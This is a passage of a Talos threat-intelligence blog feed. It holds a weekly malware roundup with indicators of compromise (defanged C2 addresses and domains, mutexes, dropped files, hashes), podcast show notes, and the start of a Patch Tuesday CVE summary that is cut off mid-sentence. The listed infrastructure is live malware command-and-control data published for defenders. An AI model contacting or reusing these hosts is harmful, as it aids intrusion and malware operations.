drives.</li><li><b>Win.Malware.Dijo-6748031-0</b><br /> Malware<br /> Win.Malware.Dijo, also known as Ursnif, is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits.</li><li><b>Win.Malware.Vobfus-6747720-0</b><br /> Malware<br /> Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will run when the system is booted. Once installed, it attempts to download follow-on malware from its command and control (C2) servers.</li><li><b>Win.Downloader.Upatre-6746951-0</b><br /> Downloader<br /> Upatre is a malicious downloader often used by exploit kits and phishing campaigns. 
Upatre downloads and executes malicious executables, such as banking malware.</li><li><b>Win.Malware.Emotet-6745295-0</b><br /> Malware<br /> Emotet is a banking trojan that has remained relevant due to its continual evolution to bypass antivirus products. It is commonly spread via malicious emails.</li></ul><hr /><h2>Threats</h2><h3>Win.Ransomware.Gandcrab-6748603-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>Global\pc_group=WORKGROUP&amp;ransom_id=4a6a799098b68e3c</li><li>\BaseNamedObjects\Global\pc_group=WORKGROUP&amp;ransom_id=ab8e4b3e3c28b0e4</li><li>Global\7bf1bf81-e78a-11e8-a007-00501e3ae7b5</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>66[.]171[.]248[.]178</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>ipv4bot[.]whatismyipaddress[.]com</li></ul><b>Files and/or directories created</b><br /><ul><li>%AllUsersProfile%\Microsoft\Crypto\RSA\S-1-5-18\6d14e4b1d8ca773bab785d1be032546e_d19ab989-a35f-4710-83df-7b2db7efe7c5</li><li>%AppData%\Microsoft\umitoa.exe</li><li>%AppData%\Microsoft\hhbbvc.exe</li><li>\Win32Pipes.000006c8.00000045</li><li>\Win32Pipes.000006c8.00000047</li><li>\Win32Pipes.000006c8.00000049</li></ul><b>File Hashes</b><br /><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><img border="0" src="https://3.bp.blogspot.com/-oncQnM6w9_4/W-8LTtjbNtI/AAAAAAAABKM/G00vwF_ccqMd_jYVwGp-Sn2x2yJcIU4TwCLcBGAs/s400/00f07cc799aabac7449a324ff47161a6a34ad02ba4b2074ddb382152d383ed14_amp.png" width="400" /></div><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><img border="0" src="https://2.bp.blogspot.com/-bYYTlT4LWOU/W-8LYT9ZfvI/AAAAAAAABKQ/w5nkwQ_RySIjo8NsfgncRbprWhn3w4SOACLcBGAs/s640/0f2784bc6fb959eace7e44fd19fd08fbfa39af04b4f793241c3eddd4183dbe71_tg.png" width="640" /></div><br /><br /><h3>Win.Virus.Parite-6748128-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>Residented</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and/or directories created</b><br /><ul><li>%AppData%\Wplugin.dll</li><li>%WinDir%\Wplugin.dll</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\yma1.tmp</li><li>%LocalAppData%\Temp\neb2886.tmp</li></ul><b>File Hashes</b><br /><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><img border="0" src="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" /></div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><img border="0" src="https://4.bp.blogspot.com/-dMfTeSFpblE/W-8LnUJ_J6I/AAAAAAAABKY/CfrrO_BYCcktPRB6w54FrIeTA-WHyHzCwCLcBGAs/s400/2aea31075160d93b13bb726dc95b2a46505deefa529f8c9edfd9f6ecd8d80a37_amp.png" width="400" /></div><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><img border="0" src="https://1.bp.blogspot.com/-MHV_27INnoE/W-8LtJ_QjcI/AAAAAAAABKg/xx8OmtGEjUIcKz2LXuI4ipQCu_lMEz_kACLcBGAs/s640/0e70c57c577078b1c9cab7d6bd1215372330548ae0c20ff2b80f0cb86cde2074_tg.png" width="640" /></div><br /><br /><h3>Win.Malware.Dijo-6748031-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>95[.]181[.]198[.]115</li><li>192[.]162[.]244[.]171</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>resolver1[.]opendns[.]com</li><li>222[.]222[.]67[.]208[.]in-addr[.]arpa</li><li>myip[.]opendns[.]com</li><li>www[.]bing[.]com</li><li>hq92lmdlcdnandwuq[.]com</li><li>cyanteread[.]com</li><li>tmencedfur[.]com</li></ul><b>Files and/or directories created</b><br /><ul><li>%LocalAppData%\Temp\RESB9BE.tmp</li><li>%LocalAppData%\Temp\CSCE580781F303F45AE9F8858B262C2D7E7.TMP</li><li>%LocalAppData%\Temp\9DF6.bin</li><li>%LocalAppData%\Temp\CB8E.bin</li><li>%LocalAppData%\Temp\3F14.bi1</li><li>%LocalAppData%\Temp\RESBCAB.tmp</li><li>%LocalAppData%\Temp\CSC8B3FB8E53BAD4C5CA67A2B1CAEA0ABB3.TMP</li><li>%LocalAppData%\Temp\5mq30dkw.2sp.psm1</li><li>%LocalAppData%\Temp\jrz15mzo.uwv.ps1</li><li>%LocalAppData%\Temp\lajoenvy.0.cs</li><li>%LocalAppData%\Temp\lajoenvy.cmdline</li><li>%LocalAppData%\Temp\lajoenvy.dll</li><li>%LocalAppData%\Temp\lajoenvy.err</li><li>%LocalAppData%\Temp\lajoenvy.out</li><li>%LocalAppData%\Temp\lajoenvy.tmp</li></ul><b>File Hashes</b><br /><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><img border="0" src="https://1.bp.blogspot.com/-7kBGH7fEMJU/W-8L4WdgPzI/AAAAAAAABKk/rMVJdQLknr0pHG6rQaeUdRXT5-hQwTRpwCLcBGAs/s400/07b911ca945371e153a661cc0d3dc04a41e75075b184eeba26a82c6a945a82e2_amp.png" width="400" /></div><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><img border="0" src="https://2.bp.blogspot.com/-xjuZioJP6CI/W-8L-Efy9sI/AAAAAAAABKs/oLZZnbOEA7USBYkNKxzeZmIagkpax2iAgCLcBGAs/s640/176c6b349ca3812e39b29ae3b2370c91448d2b3808295fbb87d96d7a73698613_tg.png" width="640" /></div><br /><b>Umbrella</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><img border="0" src="https://4.bp.blogspot.com/-t_th9TOBm_o/W-8MCytnrSI/AAAAAAAABKw/sbPgXNjusiYJZQ27VwymHA-X08Zjgiy0ACLcBGAs/s640/176c6b349ca3812e39b29ae3b2370c91448d2b3808295fbb87d96d7a73698613_umbrella.png" width="640" /></div><br /><br /><h3>Win.Malware.Vobfus-6747720-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKCU&gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN <ul><li>Value Name: muehe</li></ul></li></ul><b>Mutexes</b><br /><ul><li>\BaseNamedObjects\A</li><li>A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>ns1[.]chopsuwey[.]org</li><li>ns1[.]chopsuwey[.]biz</li><li>ns1[.]chopsuwey[.]info</li><li>ns1[.]chopsuwey[.]com</li><li>ns1[.]chopsuwey[.]net</li></ul><b>Files and/or directories created</b><br /><ul><li>\??\E:\autorun.inf</li><li>\autorun.inf</li><li>\??\E:\System Volume Information.exe</li><li>\System Volume Information.exe</li><li>\$RECYCLE.BIN.exe</li><li>\??\E:\$RECYCLE.BIN.exe</li><li>\Secret.exe</li><li>\??\E:\Passwords.exe</li><li>\??\E:\Porn.exe</li><li>\??\E:\Secret.exe</li><li>\??\E:\Sexy.exe</li><li>\??\E:\x.mpeg</li><li>\Passwords.exe</li><li>\Porn.exe</li><li>\Sexy.exe</li><li>%SystemDrive%\Documents and Settings\Administrator\sauuyi.exe</li><li>%UserProfile%\muehe.exe</li><li>\??\E:\RCXFF.tmp</li><li>\??\E:\muehe.exe</li><li>\RCXFBD0.tmp</li><li>\RCXFF.tmp</li><li>\muehe.exe</li></ul><b>File Hashes</b><br /><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><img border="0" src="https://2.bp.blogspot.com/-EeEdGZBuT74/W-8MTmK7HYI/AAAAAAAABLA/6-mHHnopTIQ1DyWoRMrhdPPl6Na0tiD7ACLcBGAs/s400/0572a5a7f2888736e647fccbd2d4ed051bb038b82d3d53fb899dcde836922fc2_amp.png" width="400" /></div><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><img border="0" src="https://4.bp.blogspot.com/-KoKC1Yoz-2U/W-8MYZmuSoI/AAAAAAAABLE/JxDW9qHlNcQQ9h2Fg4ki5hWp1Yyx-MMXACLcBGAs/s640/02785ab8fe2473f20ea32dad5908f6b8831d603c26db26e67e8b3d1daefd4544_tg.png" width="640" /></div><br /><br /><b>Umbrella</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><img border="0" src="https://4.bp.blogspot.com/-7J0i2oHHKro/W-8MeYQ1zEI/AAAAAAAABLI/lSlJjDmyM6ULuM9WU8PMfeOsx_CKTUfPwCLcBGAs/s640/010054eb95e98fdfea1f1164b12a5dcf475f0ffcc16dc18c276553d4bce3e39c_umbrella.png" width="640" /></div><br /><br /><h3>Win.Downloader.Upatre-6746951-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>195[.]38[.]137[.]100</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>drippingstrawberry[.]com</li></ul><b>Files and/or directories created</b><br /><ul><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ffengh.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\hfsrfgs.exe</li><li>%LocalAppData%\Temp\ffengh.exe</li><li>hfsrfgs.exe</li></ul><b>File Hashes</b><br /><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></div><br /><h4>Screenshots of 
Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-rum40lUb_bE/W-8MrA6QurI/AAAAAAAABLU/_ajK9YebfCA-4fYxLBS8fhf26iCCKhB9QCLcBGAs/s1600/1df5a1477102ad9d32a976eea0af04b7c63a660fefc39a8c2c524e8cfa9634e3_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://3.bp.blogspot.com/-rum40lUb_bE/W-8MrA6QurI/AAAAAAAABLU/_ajK9YebfCA-4fYxLBS8fhf26iCCKhB9QCLcBGAs/s400/1df5a1477102ad9d32a976eea0af04b7c63a660fefc39a8c2c524e8cfa9634e3_amp.png" width="400" /></a></div><br /><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-BgkN6BBGgeQ/W-8Mwx4PQxI/AAAAAAAABLc/h5nOSApYDUM1zpFlZXIp-VcZXJlKcj3ZwCLcBGAs/s1600/56db7b1dd0bcbeca631eee556146fb599fc363466f51ec01eae28ecd4289e838_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="505" data-original-width="962" height="334" src="https://2.bp.blogspot.com/-BgkN6BBGgeQ/W-8Mwx4PQxI/AAAAAAAABLc/h5nOSApYDUM1zpFlZXIp-VcZXJlKcj3ZwCLcBGAs/s640/56db7b1dd0bcbeca631eee556146fb599fc363466f51ec01eae28ecd4289e838_tg.png" width="640" /></a></div><br /><br /><b>Umbrella</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-dyim72ozFvM/W-8M2KAn2yI/AAAAAAAABLg/MaLujEwbPOw9m_D8-GdV_aQ2I2e11hpZgCLcBGAs/s1600/af44d4fff8ce394f9ecb9b3f9d95b8fb440a7b8f1892574f41355072ec2f0999_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://4.bp.blogspot.com/-dyim72ozFvM/W-8M2KAn2yI/AAAAAAAABLg/MaLujEwbPOw9m_D8-GdV_aQ2I2e11hpZgCLcBGAs/s640/af44d4fff8ce394f9ecb9b3f9d95b8fb440a7b8f1892574f41355072ec2f0999_umbrella.png" width="640" /></a></div><br /><br 
/><h3>Win.Malware.Emotet-6745295-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\SERVICES\GENRALNLA <ul><li>Value Name: ObjectName</li></ul></li></ul><b>Mutexes</b><br /><ul><li>Global\I98B68E3C</li><li>Global\M98B68E3C</li><li>PEM19C</li><li>PEM52C</li><li>PEM748</li><li>PEM43C</li><li>PEM20C</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>187[.]162[.]64[.]157</li><li>98[.]144[.]2[.]113</li><li>200[.]71[.]62[.]76</li><li>82[.]211[.]30[.]202</li><li>165[.]255[.]91[.]69</li><li>154[.]0[.]171[.]246</li><li>110[.]142[.]247[.]110</li><li>119[.]59[.]124[.]163</li><li>108[.]51[.]20[.]17</li><li>197[.]249[.]165[.]27</li><li>96[.]242[.]234[.]105</li><li>217[.]91[.]43[.]150</li><li>66[.]220[.]110[.]56</li><li>72[.]67[.]198[.]45</li><li>183[.]88[.]1[.]238</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>N/A</li></ul><b>File Hashes</b><br 
/><ul><li>0edecb893280c8258b5ee20f17afdbdcd09efdec198ba3f0b9dae3bb3a74c497</li><li>11fb93e3b137ff6978fd79fdd634f44f257ee28f9bc5c2965108cb5c49a0d949</li><li>313f19bdb8c46b96ac18bca55f53f5c0eb03d2fcececaab47b9339d8f014f7c7</li><li>40651a1759d2ae614541d3f6e8bb6298ab72a242673c44e541dc28e30ca8929f</li><li>5df55f78a21cd8457c9432afc8da45c182fad6107e3b6e4f5cf86272b68012b1</li><li>70921b45506097595f7d11123c1b5c92aa032332c8a503058b27f32ec85d8df2</li><li>73689ce1d669a63bdc781fab63f052fdc22021f7d08d37ed7573d2da7230568e</li><li>83b316b9a9f76efcab1e741c8eeb7a0c7a50072c3fde5acd49cb0d28afbe7a23</li><li>9edeb5b8ba0b6fd036650f80edf1cdd3c35974fcb8ef5a272b658d3ec1a38035</li><li>b53fb3cf4ed1d4e62dd0cc9d8e1d482dc1a55dedc3804a097f1b213080bb64c5</li><li>dab7877de92a3793873fec30c4b2e4a758bd5c3c6a67c8da20bfce7c255031be</li><li>ea8479d471d38105312f8264f2d93c7dd317d1bfda94f345f74313efffe8fb54</li><li>eba4704ea3e2a37a2bef98101758cbd2264bf6dcfe36eb930fe36fa32d75838a</li><li>f2a2d0eda6e21c4273d07aafe190918d96c21db335de4c4872e1eca136920c6b</li><li>fba4b9baf4b72790f1ff9ad58160efd7bd4a1927191668da75468255083e48b9</li><li>fc5935b12a8d07abcafc613a04d3c6773e088f31b88f78acc7f8ee2d2fc2d529</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-sxZXgnKirDo/W-8NDT9QSGI/AAAAAAAABLo/EFx2nDiHAx4wejDJYBQZ2wyhfVnVKOYbgCLcBGAs/s1600/40651a1759d2ae614541d3f6e8bb6298ab72a242673c44e541dc28e30ca8929f_amp.png" 
imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://4.bp.blogspot.com/-sxZXgnKirDo/W-8NDT9QSGI/AAAAAAAABLo/EFx2nDiHAx4wejDJYBQZ2wyhfVnVKOYbgCLcBGAs/s400/40651a1759d2ae614541d3f6e8bb6298ab72a242673c44e541dc28e30ca8929f_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-4ROwjwTV-vk/W-8NKVxZpnI/AAAAAAAABLs/FkvXxcHHpC0vTDj1PKMi9ue4KNNaQhkNgCLcBGAs/s1600/fba4b9baf4b72790f1ff9ad58160efd7bd4a1927191668da75468255083e48b9_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="633" data-original-width="962" height="420" src="https://1.bp.blogspot.com/-4ROwjwTV-vk/W-8NKVxZpnI/AAAAAAAABLs/FkvXxcHHpC0vTDj1PKMi9ue4KNNaQhkNgCLcBGAs/s640/fba4b9baf4b72790f1ff9ad58160efd7bd4a1927191668da75468255083e48b9_tg.png" width="640" /></a></div><b><br /></b><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><br /></div></div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/heeAUQuVzwQ" height="1" width="1" alt=""/>2018-12-13T14:21:28.953-05:000https://blog.talosintelligence.com/2018/11/threat-roundup-1109-1116.htmlBeers with Talos Ep. 
#41: Sex, money and malwarehttp://feedproxy.google.com/~r/feedburner/Talos/~3/MQNAq8HRxgE/beers-with-talos-ep-41-sextortion-money.htmlbeers with talosmobilepodcastvulnerability analysisnoreply@blogger.com (Mitch Neff)Wed, 14 Nov 2018 08:38:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-7874716333295536854<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-VO1MwKSiMRM/WUBDawHg2eI/AAAAAAAAAIU/lz_fWXn3B7YnoXCcqaHFQpgkXSaMpvi3QCPcBGAYYCw/s1600/facebook_timeline_podcast.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="630" data-original-width="1200" height="336" src="https://4.bp.blogspot.com/-VO1MwKSiMRM/WUBDawHg2eI/AAAAAAAAAIU/lz_fWXn3B7YnoXCcqaHFQpgkXSaMpvi3QCPcBGAYYCw/s640/facebook_timeline_podcast.jpg" width="640" /></a></div>Beers with Talos (BWT) Podcast Ep. #41 is now available. 
Download this episode and subscribe to Beers with Talos:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://itunes.apple.com/us/podcast/beers-with-talos-podcast/id1236329410" target="_blank"><img border="0" data-original-height="45" data-original-width="160" src="https://4.bp.blogspot.com/-WLkU01IRCLw/WaWCg3YHpRI/AAAAAAAAAJA/nQ2rFarDFeAUBY4ncARRUVaNkMpBKC0KgCLcBGAs/s1600/itunes_button.png" /></a><a href="https://play.google.com/music/listen?u=0#/ps/Ikcmodkhrjtblk5yks47s5uqbca" target="_blank"><img border="0" data-original-height="45" data-original-width="160" src="https://2.bp.blogspot.com/-E-RSSZ9jbUY/WaWCkLGZnZI/AAAAAAAAAJE/Ciiz-Si4oA0cgR9tMGSGbT9336qrYuDeACLcBGAs/s1600/google_play_button.png" /></a><a href="https://www.stitcher.com/podcast/talos/beers-with-talos" target="_blank"><img border="0" data-original-height="45" data-original-width="160" src="https://1.bp.blogspot.com/-HIihRfTvh8I/WedjsKBFNhI/AAAAAAAAAKk/TCPBZoIkYdcW8QJujRtxxwjr70x4drh_wCEwYBhgL/s1600/stitcher_button.png" /></a></div><br />If iTunes and Google Play aren't your thing, click&nbsp;<a href="http://www.talosintelligence.com/podcast">here</a>.<br /><h3></h3><h3>Ep. #41 show notes:&nbsp;</h3>Recorded Nov. 9, 2018 — We tried to make this episode last week, but thanks to some technical difficulties, we ended up calling that one a practice run. Here is take two, focused on recent sextortion scams and the pending machine learning apocalypse. 
We also review why vulnerability discovery and red teams are the most important line items in your security budget by looking at a recent story where a breach cost dozens of lives.<br /><h3><a name='more'></a>The timeline:</h3><div><div><h4>The topics</h4>00:38 — Roundtable: We are now trivia-worthy<br />12:25 — Persian Stalker and on down the mobile rabbit hole<br />22:45 — The anatomy of sextortion scams<br />31:32 — Machine learning and the malware wars<br />45:20 — Vulnerability discovery: Why our 200-vuln milestone is both important and amazing<br />52:32 — Save the red team, CIA covert comms cover blown<br />1:02:49 — Closing thoughts and parting shots<br /><h4>The links</h4><ul><li><span style="font-family: &quot;arial&quot;; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;"><a href="https://twitter.com/sectalks_twb/status/1060511824246845440" target="_blank">BWT as a Trivia question</a></span></li><li><span style="font-family: &quot;arial&quot;; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;"><a href="https://blog.talosintelligence.com/2018/11/persian-stalker.html" target="_blank">Persian Stalker blog post</a></span></li><li><span style="font-family: &quot;arial&quot;; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;"><a href="https://blog.talosintelligence.com/2018/10/anatomy-of-sextortion-scam.html" target="_blank">Anatomy of a Sextortion Scam</a></span></li><li><span style="font-family: &quot;arial&quot;; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;"><a href="https://govmatters.tv/cyber-vulnerabilities-in-supply-chain-management/" target="_blank">Government Matters interview</a></span></li><li><span style="font-family: &quot;arial&quot;; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;"><a 
href="https://foreignpolicy.com/2018/08/15/botched-cia-communications-system-helped-blow-cover-chinese-agents-intelligence/" target="_blank">CIA comms system blown open</a></span></li></ul></div><div>==========<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><br />Featuring:&nbsp;<a href="https://twitter.com/security_craig">Craig Williams</a>&nbsp;(@Security_Craig),&nbsp;<a href="https://twitter.com/JoelEsler">Joel Esler</a>&nbsp;(@JoelEsler),&nbsp;<a href="https://twitter.com/kpyke">Matt Olney</a>&nbsp;(@kpyke) and&nbsp;<a href="https://twitter.com/EnglishLFC">Nigel Houghton</a>&nbsp;(@EnglishLFC).<br />Hosted by&nbsp;<a href="https://twitter.com/MitchNeff">Mitch Neff</a>&nbsp;(@MitchNeff).<br />Find all episodes&nbsp;<a href="http://cs.co/talospodcast">here</a>.<br /><br /><a href="http://cs.co/talositunes">Subscribe via iTunes</a>&nbsp;(and leave a review!)<br /><br />Check out the&nbsp;<a href="http://cs.co/talosresearch">Talos Threat Research Blog</a><br /><br />Subscribe to the&nbsp;<a href="http://cs.co/talosupdate">Threat Source newsletter</a><br /><br />Follow&nbsp;<a href="http://cs.co/talostwitter">Talos on Twitter</a><br /><br />Give us your feedback and suggestions for topics:<br /><a href="mailto:beerswithtalos@cisco.com">beerswithtalos@cisco.com</a></div></div></div></div>2018-11-14T12:12:51.446-05:000https://blog.talosintelligence.com/2018/11/beers-with-talos-ep-41-sextortion-money.htmlMicrosoft Patch Tuesday — November 2018: Vulnerability disclosures and Snort coveragehttp://feedproxy.google.com/~r/feedburner/Talos/~3/Jiyuq1xupwg/microsoft-patch-tuesday-october-2018_13.htmlMicrosoftMicrosoft Patch TuesdaySnortSnort Rulesvulnerabilitiesnoreply@blogger.com (Jonathan Munshaw)Tue, 13 Nov 2018 10:53:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-7263444914334351903<div dir="ltr" style="text-align: left;" 
trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-o-bMM_JQczQ/XBKvF5mhu2I/AAAAAAAAABI/njSHtUvhcq89lJC3EiBDgRE4afjI2nJTACPcBGAYYCw/s1600/recurring%2Bblog%2Bimages_patch%2Btuesday.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="501" data-original-width="1001" src="https://2.bp.blogspot.com/-o-bMM_JQczQ/XBKvF5mhu2I/AAAAAAAAABI/njSHtUvhcq89lJC3EiBDgRE4afjI2nJTACPcBGAYYCw/s1600/recurring%2Bblog%2Bimages_patch%2Btuesday.jpg" /></a></div><br />Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 53 vulnerabilities: 11 rated "critical," 40 rated "important," one rated "moderate" and one rated "low."<br /><br />The advisories cover bugs in the Chakra scripting engine, Microsoft Outlook and DirectX.<br /><br />This update also includes three advisories. One covers vulnerabilities in Adobe Flash Player, and another covers important bugs in the Microsoft Surface tablet. Additionally, there is guidance on how users should configure BitLocker to enforce software encryption rather than relying on a drive's built-in hardware encryption.<br /><br />For more on our coverage for these vulnerabilities, check out the SNORTⓇ blog post <a href="https://blog.snort.org/2018/11/snort-rule-update-for-nov-13-microsoft.html">here</a>.<br /><a name='more'></a><br /><h2 style="text-align: left;">Critical vulnerabilities</h2>Microsoft disclosed 11 critical vulnerabilities this month, which we will highlight below. 
There is also a critical advisory covering Adobe Flash Player.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8541">CVE-2018-8541</a>, <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8542">CVE-2018-8542</a>, <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8543">CVE-2018-8543</a>, <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8551">CVE-2018-8551</a>, <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8555">CVE-2018-8555</a>, <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8556">CVE-2018-8556</a>, <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8557">CVE-2018-8557</a> and <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8588">CVE-2018-8588</a> are all memory corruption vulnerabilities in the Chakra scripting engine. They all lie in the way that the scripting engine handles objects in memory in the Microsoft Edge internet browser. These vulnerabilities could corrupt memory in a way that an attacker could execute code in the context of the current user. An attacker needs to convince a user to open a specially crafted, malicious website on Microsoft Edge in order to exploit these bugs.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8476">CVE-2018-8476</a> is a remote code execution vulnerability in the Windows Deployment Services TFTP server. The bug lies in the way the TFTP server handles objects in memory. 
An attacker could exploit this vulnerability by sending a specially crafted request to the TFTP server.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8553">CVE-2018-8553</a> is a remote code execution vulnerability in Microsoft Graphics Components that lies in the way Graphics Components handles objects in memory. An attacker can exploit this vulnerability by providing the user with a specially crafted file.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8544">CVE-2018-8544</a> is a remote code execution vulnerability that exists in the way that the VBScript engine handles objects in memory. An attacker needs to trick a user into visiting a specially crafted website in Internet Explorer in order to exploit this vulnerability. Alternatively, the attacker could embed an 